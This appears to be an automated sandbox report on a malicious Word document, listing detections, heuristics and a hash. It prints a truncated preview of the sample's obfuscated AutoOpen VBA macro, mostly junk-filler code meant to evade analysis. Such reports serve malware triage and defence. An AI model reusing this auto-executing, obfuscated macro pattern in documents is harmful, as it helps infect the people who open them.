Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic
The sample is a malicious Office document containing a VBA macro. The presence of the 'AutoOpen' macro indicates an attempt to automatically execute code when the document is opened. The ClamAV detection 'Doc.Malware.Pwshell-6700199-0' further confirms its malicious nature, suggesting it may be related to PowerShell-based malware. The macro itself is heavily obfuscated, preventing a detailed analysis of its specific actions.
Heuristics (5)

- ClamAV: Doc.Malware.Pwshell-6700199-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Pwshell-6700199-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main (In document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (In document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (In document text, OLE body)

Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 125552 bytes |

SHA-256: 06be6e59298e5cc51109c78c49265935b5989074c82c971d132d7df5d2731cb0

Preview script: first 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const nIxuporekIaBuROVBosYbuwEKOiiDYf = 0
Sub AutoOpen()
On Error Resume Next
Dim iExenuqOtAZINOcyNaMoyXyJixycohYdSywArYf(5)
If LenB("LYrEHadYiiXYFaxasus") < 78869 Then
iExenuqOtAZINOcyNaMoyXyJixycohYdSywArYf(0) = VarType(Sqr(7886) + CInt("7886"))
End If
iExenuqOtAZINOcyNaMoyXyJixycohYdSywArYf(1) = LTrim("LYrEHadYiiXYFaxasus") & "99"
iExenuqOtAZINOcyNaMoyXyJixycohYdSywArYf(2) = Day(78867886)
If Len("iExenuqOtAZINOcyNaMoyXyJixycohYdSywArYf") < Len("LYrEHadYiiXYFaxasus") Then
iExenuqOtAZINOcyNaMoyXyJixycohYdSywArYf(3) = Weekday(78869)
End If
Dim nuQUroBiJodYNAsYCMIXALacUCOCEDitaFeLivYXav(5)
Dim laMUxoporyLakuJUiALuMEioNIDIBiFoXoquZOQ(5)
If LenB("mECGIaaVapECuqImuCeGOru") < 87578 Then
laMUxoporyLakuJUiALuMEioNIDIBiFoXoquZOQ(0) = VarType(Sqr(8757) + CInt("8757"))
End If
laMUxoporyLakuJUiALuMEioNIDIBiFoXoquZOQ(1) = LTrim("mECGIaaVapECuqImuCeGOru") & "88"
laMUxoporyLakuJUiALuMEioNIDIBiFoXoquZOQ(2) = Day(87578757)
If Len("laMUxoporyLakuJUiALuMEioNIDIBiFoXoquZOQ") < Len("mECGIaaVapECuqImuCeGOru") Then
laMUxoporyLakuJUiALuMEioNIDIBiFoXoquZOQ(3) = Weekday(87578)
End If
Dim piPIgEMObApOFLIMyruHdunuHoDiniwejafU(5)
If LenB("hACUjoweLETatUcijEpyJ") < 32454 Then
piPIgEMObApOFLIMyruHdunuHoDiniwejafU(0) = VarType(Sqr(3245) + CInt("3245"))
End If
piPIgEMObApOFLIMyruHdunuHoDiniwejafU(1) = LTrim("hACUjoweLETatUcijEpyJ") & "44"
piPIgEMObApOFLIMyruHdunuHoDiniwejafU(2) = Day(32453245)
If Len("piPIgEMObApOFLIMyruHdunuHoDiniwejafU") < Len("hACUjoweLETatUcijEpyJ") Then
piPIgEMObApOFLIMyruHdunuHoDiniwejafU(3) = Weekday(32454)
End If
Dim dAHohEwUjIQETunYQhyiuFojbODonaWbYJYWyzuVyf(5)
If LenB("iowdAlODEpoWufipy") < 10657 Then
dAHohEwUjIQETunYQhyiuFojbODonaWbYJYWyzuVyf(0) = VarType(Sqr(1065) + CInt("1065"))
End If
dAHohEwUjIQETunYQhyiuFojbODonaWbYJYWyzuVyf(1) = LTrim("iowdAlODEpoWufipy") & "77"
dAHohEwUjIQETunYQhyiuFojbODonaWbYJYWyzuVyf(2) = Day(10651065)
If Len("dAHohEwUjIQETunYQhyiuFojbODonaWbYJYWyzuVyf") < Len("iowdAlODEpoWufipy") Then
dAHohEwUjIQETunYQhyiuFojbODonaWbYJYWyzuVyf(3) = Weekday(10657)
End If
If LenB("HeXYGYvAKajAvegovOtYaYs") < 33683 Then
Dim kAaOPyiYVekNZesivEDOaUUvIGOygEvU(5)
If LenB("leqUuCYBygigyZufOzEkYku") < 46974 Then
kAaOPyiYVekNZesivEDOaUUvIGOygEvU(0) = VarType(Sqr(4697) + CInt("4697"))
End If
kAaOPyiYVekNZesivEDOaUUvIGOygEvU(1) = LTrim("leqUuCYBygigyZufOzEkYku") & "44"
kAaOPyiYVekNZesivEDOaUUvIGOygEvU(2) = Day(46974697)
If Len("kAaOPyiYVekNZesivEDOaUUvIGOygEvU") < Len("leqUuCYBygigyZufOzEkYku") Then
kAaOPyiYVekNZesivEDOaUUvIGOygEvU(3) = Weekday(46974)
End If
Dim xOjYLUwUHexeVuGYgRyfuQeXrEMazupIai(5)
If LenB("tIDOHUCAVON") < 78457 Then
xOjYLUwUHexeVuGYgRyfuQeXrEMazupIai(0) = VarType(Sqr(7845) + CInt("7845"))
End If
xOjYLUwUHexeVuGYgRyfuQeXrEMazupIai(1) = LTrim("tIDOHUCAVON") & "77"
xOjYLUwUHexeVuGYgRyfuQeXrEMazupIai(2) = Day(78457845)
If Len("xOjYLUwUHexeVuGYgRyfuQeXrEMazupIai") < Len("tIDOHUCAVON") Then
xOjYLUwUHexeVuGYgRyfuQeXrEMazupIai(3) = Weekday(78457)
End If
nuQUroBiJodYNAsYCMIXALacUCOCEDitaFeLivYXav(0) = VarType(Sqr(3368) + CInt("3368"))
End If
Dim qAMlNaNazElErqeHYzUnFOepOdIJUlAmADAVAN(5)
If LenB("TOxUfAqyXofuJISexi") < 84319 Then
qAMlNaNazElErqeHYzUnFOepOdIJUlAmADAVAN(0) = VarType(Sqr(8431) + CInt("8431"))
End If
qAMlNaNazElErqeHYzUnFOepOdIJUlAmADAVAN(1) = LTrim("TOxUfAqyXofuJISexi") & "99"
qAMlNaNazElErqeHYzUnFOepOdIJUlAmADAVAN(2) = Day(84318431)
If Len("qAMlNaNazElErqeHYzUnFOepOdIJUlAmADAVAN") < Len("TOxUfAqyXofuJISexi") Then
qAMlNaNazElErqeHYzUnFOepOdIJUlAmADAVAN(3) = Weekday(84319)
End If
Dim nOHvuiiNuWecufukfwATimolYqaKCuzOgUNarU(5)
If LenB("debeYdAPybYBu") < 29475 Then
nOHvuiiNuWecufukfwATimolYqaKCuzOgUNarU(0) = VarType(Sqr(2947) + CInt("2947"))
End If
nOHvuiiNuWecufukfwATimolYqaKCuzOgUNarU(1) = LTrim("debeYdAPybYBu") & "55"
n
... (truncated)